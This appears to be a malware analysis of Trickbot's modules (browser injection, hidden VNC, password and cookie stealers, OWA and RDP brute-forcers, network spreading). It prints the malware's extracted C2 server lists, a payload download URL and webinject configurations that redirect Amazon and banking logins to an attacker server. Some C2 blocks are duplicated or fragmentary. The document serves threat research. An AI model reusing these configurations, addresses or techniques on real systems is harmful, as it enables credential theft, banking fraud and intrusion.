anubisDll32
This is a man-in-the-browser module. It contains a full implementation of the IcedID main module. It can intercept web traffic on the victim machine. This module also contains embedded binary Anubis VNC (also known as HDESK Bot), which is a custom RAT based on the VNC (Virtual Network Computing) protocol that’s used by IcedID for remote control.
bcClientDll32
This is a reverse proxy module with custom implementation of SOCKS5 protocol. It is used to bypass traffic through the compromised host.
bvncDll32
This module is an implementation of Hidden VNC, which is a custom remote administration tool based on the VNC (Virtual Network Computing) protocol. Hidden means that this modification of the VNC creates an additional desktop hidden from the user, allowing attackers to work with the compromised system in the same way as via an RDP connection without attracting the user’s attention. Web sessions and user passwords saved in the browser are available in hVNC sessions. An attacker can freely run a web browser on a remote system, accessing any web service when there is an active user session.
cookiesDll32
The module steals cookie data from web browsers. It targets the storage databases of Chrome, Firefox, Internet Explorer and Microsoft Edge.
domainDll32
The module is also called DomainGrabber. It collects domain controller information on compromised systems by accessing the SYSVOL folder. The first modification of this module was querying for groups.xml, services.xml, scheduledtasks.xml, datasources.xml, printers.xml and drives.xml files. The current modification of this module only queries for group policies (groups.xml).
tdpwgrab32
This module is a password stealer module. It can steal credentials stored in registry, databases of different applications, configuration and “precious files”, i.e., private keys, SSL certificates and crypto wallet data files. It is also able to grab autofill information from web browsers. The module is capable of stealing data from the following applications: Git, TeamViewer, OpenSSH, OpenVPN, KeePass, Outlook, FileZilla, Internet Explorer, Mozilla Firefox, Google Chrome, Microsoft Edge, RDP, WinSCP, VNC, UltraVNC, RealVNC, TigerVNC, PuTTY, AnyConnect. Note that newer module versions may also target other applications.
fscanDll32
This is an FTP (File Transfer Protocol) and SFTP (SSH File Transfer Protocol) file scanner based on the open-source software project cURL. The module receives a list of rules for matching files and FTP/SSH resources, enumerates the files on the targeted resource and reports back to the C2.
importDll32
This module steals data from web browsers, including browser configuration, cookies, history, title, visit count, HTML5 local storage. The browsers Internet Explorer, Mozilla Firefox, Google Chrome, and Microsoft Edge are targeted. The module also gathers information about installed browser plugins and components.
injectDll32
This module is used to intercept activity related to banking websites in browsers. It uses web injects to steal financial information. Two types of attack are supported: “static” and “dynamic”. Static attacks redirect user requests to a malicious phishing page, while dynamic attacks pass all traffic through the malicious proxy server, making it possible to grab information from input forms and modify banking website responses by injecting additional malicious scripts in returned pages.
mailsearcher32
This module enumerates all disks and folders, and searches for email patterns in files. It ignores files with selected extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav’, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico. In addition it unpacks files with .xlsx, .docx, and .zip extensions, and performs the same email patterns search in the extracted file. Every time scanning of a disk ends, the module sends the list of found addresses back to the C2 server.
masrvDll32
This module is a network scanner based on source code of the Masscan software project. The module requests the range of IP addresses from the C2, scans all IPs in this range for the opened port, and sends the list of found addresses and ports back to the C2 server.
mlcDll32
This module implements the main functionality of the Gophe spambot. The Gophe spambot was used to propagate Dyre malware. As the successor to Dyre, it comes as no surprise that Trickbot has also inherited Gophe’s source code. It can grab emails from Outlook and send spam through Outlook using MAPI. It also removes traces of spamming by deleting emails from the Outlook Sent Items folder. This module is also propagated by Trickbot as a standalone executable known as TrickBooster.
networkDll32
This module gets information about the network from the local system. It uses the following ADSI (Active Directory Service Interfaces) property methods to gather information:
ComputerName; SiteName; DomainShortName; DomainDNSName; ForestDNSName; DomainController. It retrieves the DNS names of all the directory trees in the local computer’s forest. It also gets a full process list and system information snapshot (OS Architecture / ProductType / Version / Build / InstalationDate / LastBootUpTime / SerialNumber / User / Organization / TotalPhysicalMemory).
The module executes and gathers the results of selected commands:
“ipconfig /all” “net config workstation” “net view /all” “net view /all /domain” “nltest /domain_trusts” “nltest /domain_trusts /all_trusts”
NewBCtestnDll32
This module is a reverse proxy module with custom implementation of the SOCKS5 protocol. It’s used to bypass traffic through the compromised host. The module can determine the external network IP address by STUN protocol using Google’s STUN servers. It can also create new processes by receiving a command line from a proxy-C2. It can’t download binaries for execution, but the ability to create new processes by starting powershell.exe with a Base64 encoded script in the command line transforms this module into a backdoor. Note that this is a common tactic for many actors.
outlookDll32
This module is written in Delphi, which is uncommon. The module tries to retrieve credentials from the Outlook profile stored in the system registry.
owaDll32
This module receives a list of domains, logins and passwords from the C2, and tries to find an OWA service on selected domains. To do so, it creates a URL by adding subdomains (‘webmail.’, ‘mail.’, ‘outlook.’) to domains from the list, and setting the URL path to ‘/owa’. After that it makes a POST request to the crafted URL, and checks the response for strings, tags or headers that are specific to an OWA service. The module then reports back to the C2 about the OWA URLs it finds. It can also perform a brute-force attack on the OWA URLs with logins and passwords received from the C2.
psfin32
Using Active Directory Service Interfaces (ADSI), this module makes Lightweight Directory Access Protocol (LDAP) and GlobalCatalog (GC) queries for organizational unit names, site name, group account name, personal account name, computer host name, with selected masks ‘POS’, ‘REG’, ‘CASH’, ‘LANE’, ‘STORE’, ‘RETAIL’, ‘BOH’, ‘ALOHA’, ‘MICROS’, ‘TERM’.
rdpscanDll32
This module receives a list of domains, IPs, logins and passwords from the C2, performs a check for RDP connection on the list of targets, and reports back to the C2 about the online status of targets. It can perform brute-force attacks on targeted systems, using the received logins and passwords. It also has the ability to brute force credentials by mutating IPs, domain names and logins, for instance, by replacing, swapping or removing letters, numbers, dots, switching from lower to upper case or vice versa, performing string inversion, etc.
shadDll32
This is the first implementation of the anubisDll32 module. It does not include the Anubis VNC embedded binary.
shareDll32
This module is used to spread Trickbot over the network. It downloads Trickbot from the URL http[:]//172[.]245.6.107/images/control.png and saves it as tempodile21.rec. It then enumerates network resources and tries to copy the downloaded Trickbot to selected shares C$ or ADMIN$ as nats21.exe. It then creates and starts a remote service on the compromised system in the following paths:
%SystemDrive%\nats21.exe %SystemRoot%\system32\nats21.exe The following service names are used to hide the presence of nats21.exe:
SystemServiceHnet HnetSystemService Techno
Conf
\NewBCtestDll64_configs
<servers>
<addr>162.209.124.166:80</addr>
<addr>167.99.206.127:80</addr>
<addr>199.247.24.9:80</addr>
</servers>
\pwgrab64_configs
<dpost>
<handler>http://186.159.1.217:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.57.97.138:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://191.103.252.29:80</handler>
<handler>http://200.35.47.199:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://79.137.119.209:443</handler>
<handler>http://216.189.145.231:443</handler>
<handler>http://194.5.250.130:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://195.123.240.31:443</handler>
<handler>http://89.46.223.252:443</handler>
</dpost>
injectDll64_configs
<dpost>
<handler>http://186.159.1.217:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.57.97.138:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://191.103.252.29:80</handler>
<handler>http://200.35.47.199:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://79.137.119.209:443</handler>
<handler>http://216.189.145.231:443</handler>
<handler>http://194.5.250.130:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://195.123.240.31:443</handler>
<handler>http://89.46.223.252:443</handler>
</dpost>
\mailsearcher64_configs
<mail>
<handler>185.198.57.70:443</handler>
</mail>
\psfin64_configs
<dpost>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.115.156.218:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://36.91.93.114:80</handler>
<handler>http://97.87.127.198:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://185.117.73.140:443</handler>
<handler>http://185.183.97.37:443</handler>
<handler>http://85.209.162.148:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://185.183.96.219:443</handler>
<handler>http://185.244.150.148:443</handler>
</dpost>
\networkDll64_configs
<dpost>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.115.156.218:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://36.91.93.114:80</handler>
<handler>http://97.87.127.198:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://185.117.73.140:443</handler>
<handler>http://185.183.97.37:443</handler>
<handler>http://85.209.162.148:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://185.183.96.219:443</handler>
<handler>http://185.244.150.148:443</handler>
</dpost>
<handler>http://186.10.243.70:8082</handler>
<handler>http://75.183.130.158:8082</handler>
<handler>http://186.183.151.194:8082</handler>
<handler>http://181.129.160.10:8082</handler>
<handler>http://181.57.97.138:80</handler>
<handler>http://200.21.51.30:80</handler>
<handler>http://191.103.252.29:80</handler>
<handler>http://200.35.47.199:80</handler>
<handler>http://190.152.125.162:80</handler>
<handler>http://79.137.119.209:443</handler>
<handler>http://216.189.145.231:443</handler>
<handler>http://194.5.250.130:443</handler>
<handler>http://192.210.152.190:443</handler>
<handler>http://195.123.240.31:443</handler>
<handler>http://89.46.223.252:443</handler>
</dpost>
\mailsearcher64_configs
<mail>
<handler>185.198.57.70:443</handler>
</mail>
webinject
<igroup>
<dinj>
<lm>*.com/SPF/Login/Auth.aspx*</lm>
<hl>http://185.202.174.13/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*.com/SPF/Login/favicon.ico?*</lm>
<hl>http://185.202.174.13/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*favicon.ico=f7caf50483938302d86aa228d161e435*</lm>
<hl>http://185.202.174.13/response.php</hl>
<pri>100</pri>
<sq>1</sq>
</dinj>
</igroup>
<dinj>
<lm>*amazon.*</lm>
<hl>https://185.202.174.13:446/response.php?s=1527163537124692&id=DeJENQHkNQsIpSv5YWb8</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>https://www.amazon.co.uk/ap/signin</ignore_mask>
<ignore_mask>https://www.amazon.co.uk/*</ignore_mask>
<ignore_mask>https://www.amazon.co.uk/gp/yourstore/home*</ignore_mask>
<ignore_mask>https://sellercentral.amazon.com/ap/signin*</ignore_mask>
<ignore_mask>https://sellercentral.amazon.com/gp/notifications/notification-widget-internals.html*</ignore_mask>
<ignore_mask>*popokai.com*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>https://www.amazon.de/ap/signin</ignore_mask>
<ignore_mask>https://www.amazon.ca/ap/signin</ignore_mask>
<ignore_mask>https://www.amazon.de/gp/yourstore/home*</ignore_mask>
<ignore_mask>https://www.amazon.ca/gp/yourstore/home*</ignore_mask>
<ignore_mask>https://www.amazon.ca/*</ignore_mask>
<ignore_mask>https://www.amazon.de/*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://www.amazon.co.uk/ap/signin</lm>
<hl>https://185.202.174.13:446/response.php?s=1527163537124692&id=sL5FRia9p0kAxzAm7uXQ</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*popokai.com*</ignore_mask>
</dinj>
...